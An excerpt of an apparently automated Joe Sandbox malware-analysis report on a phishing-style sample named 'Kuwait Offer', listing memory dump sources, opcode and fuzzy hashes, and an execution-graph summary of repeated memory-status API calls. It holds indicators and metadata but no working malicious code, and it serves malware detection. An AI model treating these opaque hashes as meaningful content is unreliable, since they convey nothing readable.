                                          • Instruction Fuzzy Hash: 6AD12A34A00215CFDB54DFA9C584AA9F7F2BF89301F29C5A9E515AB361DB34EC81CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e7f3dbd024e3c6495d56ca9d1ecc320e10119699a0949679ba568d97a0f3a7d
                                          • Instruction ID: 4f7af2cffffecb8b3de5f5d102a0d2f84c7b69af407cb22f1d9bc96097168bde
                                          • Opcode Fuzzy Hash: 0e7f3dbd024e3c6495d56ca9d1ecc320e10119699a0949679ba568d97a0f3a7d
                                          • Instruction Fuzzy Hash: 1AB1E270E01218CFEB54CFA9C884B9DBBF6BF89304F5584A9D80DA7255DB349985CF84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f86df7ebf8c9260e9f2e44aa9cc05d64f52bd04d6ee88189fcce6b98f3667fe9
                                          • Instruction ID: 2ba3cbf3701971d3087224a7e1b1bb9dc4a4676afdd7f97c96154cd1eeebb738
                                          • Opcode Fuzzy Hash: f86df7ebf8c9260e9f2e44aa9cc05d64f52bd04d6ee88189fcce6b98f3667fe9
                                          • Instruction Fuzzy Hash: 89B1D270E01218CFEB54CFAAC884B9DBBF2BF89304F5584A9D80DA7255DB349985CF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 20c2eb5ab6fd08c5f3aa40a0afd2af23956eb1d195c625f087c6d01c994b3547
                                          • Instruction ID: f6b09df48f3d18e67a392dd83acf5aef9301acc27527f61272567cd27cbcd1af
                                          • Opcode Fuzzy Hash: 20c2eb5ab6fd08c5f3aa40a0afd2af23956eb1d195c625f087c6d01c994b3547
                                          • Instruction Fuzzy Hash: F0C17575E116188FDB58DF6AC944ADDBBF2AF89300F14C1AAD809AB325DB305E81CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e3ed61170fdcce8119b09e47255d2e44b4ad08f2585ee90fd370aaf8844af2a
                                          • Instruction ID: 0866a7777d6d15fba00b9ceb36a0620748df667e17f56d7202e0f4e3f96ee4a1
                                          • Opcode Fuzzy Hash: 5e3ed61170fdcce8119b09e47255d2e44b4ad08f2585ee90fd370aaf8844af2a
                                          • Instruction Fuzzy Hash: 39B1C170D05629CFEB94CFA9C884B9DBBF2BB49304F10906AD40ABB251DB749C89CF44
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bdfa631b789dc029ade90efc2be3864e6ef82e9bdeae8058a417d0dce6358623
                                          • Instruction ID: 7923b62fde4524add49c9e529b55bbeac9e9c7aa57aa2bc9d1e1d95398a5b417
                                          • Opcode Fuzzy Hash: bdfa631b789dc029ade90efc2be3864e6ef82e9bdeae8058a417d0dce6358623
                                          • Instruction Fuzzy Hash: B7B1B070D01629CFEB94CFA9C884B9DBBF2BB89304F10916AD409BB251DB759D89CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 959e9df47478709d8b114c18aabb69d09276963fee7a435965a70485c0f01397
                                          • Instruction ID: 83c25306a876756704f8ae108337a1c985db2683f065cd87dfc5db9e0236b971
                                          • Opcode Fuzzy Hash: 959e9df47478709d8b114c18aabb69d09276963fee7a435965a70485c0f01397
                                          • Instruction Fuzzy Hash: A5915670E01229CFDB54CFA9D854B9DB7BAFF8A300F109069D119A7255DB359A85CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45e0c0a68fe14771a661d390ec5a153a52e311d0357e73f5e812362e4b65820a
                                          • Instruction ID: 752c09f22ca7ab13c5b9c2465b847032e1e3e158a040ea9c30b0d16469edcc6c
                                          • Opcode Fuzzy Hash: 45e0c0a68fe14771a661d390ec5a153a52e311d0357e73f5e812362e4b65820a
                                          • Instruction Fuzzy Hash: 5FA1C474E01219CFDB54DF69C944B9EFBB6BF89200F1085AAD50EA7350DB30AA85CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68a6393c7602c0df07682b55479de751fd717ec131e10497e4ef194a6849f18b
                                          • Instruction ID: 0a75adae3846fda5474f4070c2c95492bc879c373ed252833e0376a7de8055e5
                                          • Opcode Fuzzy Hash: 68a6393c7602c0df07682b55479de751fd717ec131e10497e4ef194a6849f18b
                                          • Instruction Fuzzy Hash: CFA1C274E01219CFDB64DF69C944B9DFBB6BF89200F0085AAD50EA7350DB30AA85CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87c520f805ccf525fae0c27e643e45eb867aa4098ed5ce4d57f5b58aff299b58
                                          • Instruction ID: 8cab8d0db97ccf7bfb381bec6effd1889fee6e6c66c1b13667dd71d0e0acfe4a
                                          • Opcode Fuzzy Hash: 87c520f805ccf525fae0c27e643e45eb867aa4098ed5ce4d57f5b58aff299b58
                                          • Instruction Fuzzy Hash: 5C814470E01629CFDB54CFA9D854BADB7BAFF8A300F109069D11AA7354DB395A82CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7976123ef7dabcf71fe36be6b4dc08d6e5903cc4b6194e836b9a589649194ef4
                                          • Instruction ID: 4ae6a5270a8afa632f39920e2813959215077eade83eec7dafab3e057c988370
                                          • Opcode Fuzzy Hash: 7976123ef7dabcf71fe36be6b4dc08d6e5903cc4b6194e836b9a589649194ef4
                                          • Instruction Fuzzy Hash: 7E816B70A00609DFD718DFBAE85469ABBF6FF88304F14C57AC005AB269DF3A5846CB41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4fd5fec84bbc0d0fdf42550fb923e471ef7225113aa8716d197b90772ae1cad1
                                          • Instruction ID: 368952fc4df01f1b98a13335cb10ab9fe0c0f325cadefa9e4819f63e97f23fc3
                                          • Opcode Fuzzy Hash: 4fd5fec84bbc0d0fdf42550fb923e471ef7225113aa8716d197b90772ae1cad1
                                          • Instruction Fuzzy Hash: 4B811774D45218CFEBA6DFA5D849BEDBBB1BF4A304F10E0AAD409A7250DB705985CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6dd44280654e00446a2a47a4ffbcae23521f9735c4d6c04a0c529f9403435f83
                                          • Instruction ID: b4a153062a0d60ec46854649469b819d828bacb0176217148008c3753b93ac1b
                                          • Opcode Fuzzy Hash: 6dd44280654e00446a2a47a4ffbcae23521f9735c4d6c04a0c529f9403435f83
                                          • Instruction Fuzzy Hash: 31811374D04218CFEB54EFAAD8447ADBBF6FF49304F009469D109A7650DB396989CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02f9f4999a3af54304fcf4ca89be7188586214d151f6ce4f81eb124af3424915
                                          • Instruction ID: cd329236967e0d41f7c2f8cce857a061da85af4631ee7c069f142a7a6c3dcacc
                                          • Opcode Fuzzy Hash: 02f9f4999a3af54304fcf4ca89be7188586214d151f6ce4f81eb124af3424915
                                          • Instruction Fuzzy Hash: F3812274D04208CFEB54EFAAD8847ADBBF6FF49304F009469D109A7650DB396989CF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2b89cf3e4744fbec165efd41998015b15eb959577363e0324f0ab345c32d92b
                                          • Instruction ID: 8a1f9187a812af12c2af0a30b9fcdee6d65d16538790d472449f6cace4acb4c3
                                          • Opcode Fuzzy Hash: c2b89cf3e4744fbec165efd41998015b15eb959577363e0324f0ab345c32d92b
                                          • Instruction Fuzzy Hash: 1E711770A00609DFD718DFBAE85469ABBFAFB88304F14C579C009AB268DF7A58458B40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83dd04a19748e2ed6995143e8b4114e8324af0c2fa55bcb6a422ba6d97379166
                                          • Instruction ID: 4dac6fac9a3725a391bb0a97900fe805d977b88fe4b0411f825631ffab228c27
                                          • Opcode Fuzzy Hash: 83dd04a19748e2ed6995143e8b4114e8324af0c2fa55bcb6a422ba6d97379166
                                          • Instruction Fuzzy Hash: 554167B1E016198BDB48CFABC94069EFBF3AFC8300F15C16AD918AB264DB3059468B54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 415746edf71e0418968c6f0a966c106d3753372b445335d2ca0abc94be000371
                                          • Instruction ID: 0d73f168d127759607443a06d453ebc6feea34ae504a68fad26dd4e66b3b7be5
                                          • Opcode Fuzzy Hash: 415746edf71e0418968c6f0a966c106d3753372b445335d2ca0abc94be000371
                                          • Instruction Fuzzy Hash: E3510570D05A29CFEBA4CF5AD8447A9B7F2EF9A309F1094AAC409B3244D7740AD9CF54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e7bb7103b67d94382d062e4b609f5468b3a927c484df6ca0cc5adee5d125a97
                                          • Instruction ID: 64a9da1b89e954f9cf4035d7c499052f00bd64ec358128cb78435ef522a8e51f
                                          • Opcode Fuzzy Hash: 2e7bb7103b67d94382d062e4b609f5468b3a927c484df6ca0cc5adee5d125a97
                                          • Instruction Fuzzy Hash: CF41FDB4D10349DFDB54CFA9D884BEEBBF1BB09300F20912AE855AB250D7B49886CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b8938510bc84d829ba017db683f8a672074b5ea8afc019f5e4ea537725a2b53
                                          • Instruction ID: 63a4980dd71836114d513a9a256bed402c02072b61dfb1f9967a36512929765a
                                          • Opcode Fuzzy Hash: 9b8938510bc84d829ba017db683f8a672074b5ea8afc019f5e4ea537725a2b53
                                          • Instruction Fuzzy Hash: 9D41DCB4D10348DFDB54CFA9D885BDEBBF1BB09300F209129E819AB250D7B49886CF55
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01057c94d6c2c215235d21e634be5483cf67c75eaba15385def8676ac2544e54
                                          • Instruction ID: 58833dea79e658e9db2f428f5694b13fa49b507ee36a36dc48be195dc4f0b0ba
                                          • Opcode Fuzzy Hash: 01057c94d6c2c215235d21e634be5483cf67c75eaba15385def8676ac2544e54
                                          • Instruction Fuzzy Hash: 8F510DB1D056588BEB2DCF2B8D446CAFAF7AFC9300F54C1FA944CA6255DB7009858F51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e305d938dc65d86c707d3a0e901386d362bce22395052e4d3affc534a1e0b138
                                          • Instruction ID: 0fba149a291cbedff5b90b11afca95c0fc970827232f56965dabeef731dbd67d
                                          • Opcode Fuzzy Hash: e305d938dc65d86c707d3a0e901386d362bce22395052e4d3affc534a1e0b138
                                          • Instruction Fuzzy Hash: 2521F635807744BADBEA9A249E019DBFBF8AB53710F11214AE8416B592C7343F02DAE0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e0a776270d46d8d6641c2d4d70d042ec0ea2d1919596274a4d1ace5da8e2b25
                                          • Instruction ID: e1a6545e10eddadf0adbfdee79aacb2d09cc6be0c8a684dfb929ec95fcc0f621
                                          • Opcode Fuzzy Hash: 3e0a776270d46d8d6641c2d4d70d042ec0ea2d1919596274a4d1ace5da8e2b25
                                          • Instruction Fuzzy Hash: A641F0B5D05258DFDB10CFA9D480AEEFBF4AB49310F14942AE455B7240C778AA85CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f7f23e1a43bc69e6fc050dab924b96a0feffcd7e43b59f3a96a5e9531ad8274
                                          • Instruction ID: e494b5713230612a6810d9ae2542521525076af905a5146fbb7f4d9a74abdce3
                                          • Opcode Fuzzy Hash: 1f7f23e1a43bc69e6fc050dab924b96a0feffcd7e43b59f3a96a5e9531ad8274
                                          • Instruction Fuzzy Hash: A341EFB5C05258DFDB00CFAAD484AEEFBF0AF49310F14942AE455B7240C778AA85CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3e21ae05628aa7b930a11ad6f9984659e7a9b94529132d88932585368bbdb43
                                          • Instruction ID: 39969d0ca3537c82234f71f32af1a16ff063bed9e8ddb80ec8172a1fb6eae89c
                                          • Opcode Fuzzy Hash: a3e21ae05628aa7b930a11ad6f9984659e7a9b94529132d88932585368bbdb43
                                          • Instruction Fuzzy Hash: 873177B1E156188BEB68CF27C95878AFAF7AFC9304F54C1B9C40CA6254DB740A858F41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8185bddfa103c9ed1fffa5ab399e02c0fea045af1d6c7703051a726a3e14a933
                                          • Instruction ID: edecd01db1afc75abb3342bbc62a99bed32a8d22744cdfedbaf9c54dd7c4f34c
                                          • Opcode Fuzzy Hash: 8185bddfa103c9ed1fffa5ab399e02c0fea045af1d6c7703051a726a3e14a933
                                          • Instruction Fuzzy Hash: 913176B1D116188BEB68CF6BD95878EFBF7AFC9304F14C1A9C44CAA254DB750A858F01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1e7759861c7011f49c11b916857e775abfeade14743045b4a58c5397cfc79ad
                                          • Instruction ID: 963dc104a3ebc29a64956b5cb6b80de945f2edee0c87ff4b6fbbdb9a6b7f88d3
                                          • Opcode Fuzzy Hash: e1e7759861c7011f49c11b916857e775abfeade14743045b4a58c5397cfc79ad
                                          • Instruction Fuzzy Hash: A6216171D156598BEB6CCF6B8D4429AF6F7AFC8300F14C1BA840CA6264DB740A85CF54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d28c29632db65202d1ac59aae77a0c8531858191c8aed310e2391316756aad3f
                                          • Instruction ID: 1e7cb9aa402301f7dac7280b5767faeb8882bb0808620320ad1952d2ab09d9d3
                                          • Opcode Fuzzy Hash: d28c29632db65202d1ac59aae77a0c8531858191c8aed310e2391316756aad3f
                                          • Instruction Fuzzy Hash: 2521DCB5C042089FDB14DFA9D880AEEFBF4FB49310F14902AE819B7250CB75A945CFA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82c031bc26528ee6d0a4d90645f937e7e0e661b98667872b5b6d341500c0e39d
                                          • Instruction ID: 3e986900b8c77226464549f1d599034d0f78813b8a93daef05751e7d8171cdf6
                                          • Opcode Fuzzy Hash: 82c031bc26528ee6d0a4d90645f937e7e0e661b98667872b5b6d341500c0e39d
                                          • Instruction Fuzzy Hash: 0421CD71E156188BEB58CF5BD9406D9FBF7AFC9301F14C1B99848AB214DB704A858F80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c4cc8bdb8027372c36a4877bc7e0d0ded2f269018fe228a11976c606e8a909f
                                          • Instruction ID: aafc2de7746df80cf8279f53cf2783056276bcc0b8bd59ddb6ef3f53953ec58d
                                          • Opcode Fuzzy Hash: 9c4cc8bdb8027372c36a4877bc7e0d0ded2f269018fe228a11976c606e8a909f
                                          • Instruction Fuzzy Hash: B021E7B1E016188BEB28CFABD8443DEFAF7AFC9310F04C169C908AA254DB740946CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3dcf97e3deecb8885389a642eb41121c9ff7d4e5034eb360f0c4aa893057e238
                                          • Instruction ID: 4bdb40257ab9fa5966f765c88b0595c09a7cd4360662a19137e933b33d0cec1d
                                          • Opcode Fuzzy Hash: 3dcf97e3deecb8885389a642eb41121c9ff7d4e5034eb360f0c4aa893057e238
                                          • Instruction Fuzzy Hash: EF21E5B1E056188BEB18CFABD8443DEFBF7AFC9300F04C06AC909AA254DB7419458F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e88d154fe394ef07cbe0edf28b79befa98ac5cbad64054e79707982b133a9ce
                                          • Instruction ID: b7a30b33887e932d50c205e6741f6f430db18871a9cad3d90a01f99d923446fb
                                          • Opcode Fuzzy Hash: 9e88d154fe394ef07cbe0edf28b79befa98ac5cbad64054e79707982b133a9ce
                                          • Instruction Fuzzy Hash: 2621DB75D156188BEB5CCF6BD9402D9FAF7AFC9300F14C0BA9848A6214DB700A818E81

                                          Execution Graph

                                          Execution Coverage:7.6%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:21
                                          Total number of Limit Nodes:4
                                          execution_graph 28041 880848 28043 88084e 28041->28043 28042 88091b 28043->28042 28045 881340 28043->28045 28047 88134b 28045->28047 28046 881448 28046->28043 28047->28046 28049 887059 28047->28049 28051 887063 28049->28051 28050 887119 28050->28047 28051->28050 28054 52cce78 28051->28054 28060 52cce88 28051->28060 28055 52cce9d 28054->28055 28056 52cd0b2 28055->28056 28057 52cd4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28055->28057 28058 52cd4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28055->28058 28059 52cd730 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28055->28059 28056->28050 28057->28055 28058->28055 28059->28055 28061 52cce9d 28060->28061 28062 52cd0b2 28061->28062 28063 52cd4e0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28061->28063 28064 52cd4d0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28061->28064 28065 52cd730 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 28061->28065 28062->28050 28063->28061 28064->28061 28065->28061
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bfb0a8b474f892b3982de1c6c7498af0e34f773fceb9f4d30aab290f98f41ef
                                          • Instruction ID: 86517a535168387c25409ae5cd6e8780604d703782e04ce7490d81de31c12cb5
                                          • Opcode Fuzzy Hash: 0bfb0a8b474f892b3982de1c6c7498af0e34f773fceb9f4d30aab290f98f41ef
                                          • Instruction Fuzzy Hash: 5C630D31D10B198ADB11EF68C9946A9F7B1FF99300F15C79AE458B7121EB70AAC4CF81
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb57916c2b6b21378b281abad6f69914f86acc04de02196524a96cacc4ee56ae
                                          • Instruction ID: 82799d62883351f416333fb42088dbfaff71a7fd48f668f0d5c516c496f9b822
                                          • Opcode Fuzzy Hash: cb57916c2b6b21378b281abad6f69914f86acc04de02196524a96cacc4ee56ae
                                          • Instruction Fuzzy Hash: D4333E31D10B198EDB11EF68C8946ADF7B1FF99300F14C79AE449A7251EB70AAC5CB81
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.1477746253.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_880000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0a49feb88e8b7e14351b2ef300761e7a580bcf7883661db17e0b1c69ce15cee
                                          • Instruction ID: fcc47c1e8310e036aafad966061f6970a2af6b8d62cb37040dd9e7e16c7b4d0a
                                          • Opcode Fuzzy Hash: c0a49feb88e8b7e14351b2ef300761e7a580bcf7883661db17e0b1c69ce15cee
                                          • Instruction Fuzzy Hash: AD23F931D10B1A8ADB11EF68C9945A9F7B1FF99300F15C79AE458B7121EB70AAC4CF81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
